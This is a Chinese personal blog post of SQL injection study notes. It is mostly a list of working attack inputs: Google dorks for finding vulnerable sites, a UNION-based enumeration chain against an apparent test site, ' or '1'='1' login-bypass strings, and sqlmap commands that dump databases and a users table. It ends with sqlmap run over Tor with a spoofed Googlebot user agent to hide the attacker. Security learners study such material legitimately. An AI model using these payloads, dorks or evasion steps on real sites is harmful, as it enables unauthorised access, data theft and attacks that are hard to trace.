sql注入学习简单记录

作者: 一点也不想吃辣 | 来源:发表于2017-05-19 16:32 被阅读17次

    参考文章

    参考学习:http://bbs.pediy.com/thread-218235.htm

    Google search:
    inurl:"products.php?prodID="

    inurl:buy.php?category=

    http://testphp.vulnweb.com/listproducts.php?cat=1

    http://testphp.vulnweb.com/listproducts.php?cat='

    http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+1
    http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+6

    http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11

    http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11

    http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,@@version

    有时服务器不能直接理解@@ version命令,需要转换它。您将需要使用convert(@@版本使用latin1)或unhex(hex(@@版本))替换@@版本。

    http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,table_name+from+information_schema.tables

    http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()

    http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(column_name)+from+information_schema.columns+where+table_name=0x4556454e5453

    http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME)+from+information_schema.CHARACTER_SETS

    http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME,0x3a,DEFAULT_COLLATE_NAME,0x3a,DESCRIPTION,0x3a,MAXLEN)+from+information_schema.CHARACTER_SETS

    sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15

    sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

    sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

    sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns

    SQL注入攻击的类型
    经典SQLI
    盲注或推断SQL注入数据库管理系统
    特定的SQLI
    复合SQLI
    SQL注入+认证不足
    SQL注入+ DDoS 攻击
    SQL注入+ DNS劫持
    SQL注入+ XSS

    错误过滤的转义字符

    当用户输入未针对转义字符 进行过滤时,会发生这种形式的SQL注入 ,然后将其传递到SQL语句
    statement = "SELECT*FROM users WHERE name ='" + userName + "';"

    使用注释甚至阻止查询的其余部分(有三种类型的SQL注释)。所有三行最后都有一个空格:
    ' or '1'='1' --
    ' or '1'='1' ({
    ' or '1'='1' /*

    http://books.example.com/showReview.php?ID=5 AND substring(@@version,1,1)=4

    apt-get instal tor
    tor
    sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=2 --tor --tor-type=SOCKS5

    伪装成Googlebot:
    sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=2 --tor --tor-type=SOCKS5 --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

    相关文章

      网友评论

        本文标题:sql注入学习简单记录

        本文链接:https://www.haomeiwen.com/subject/zjyyxxtx.html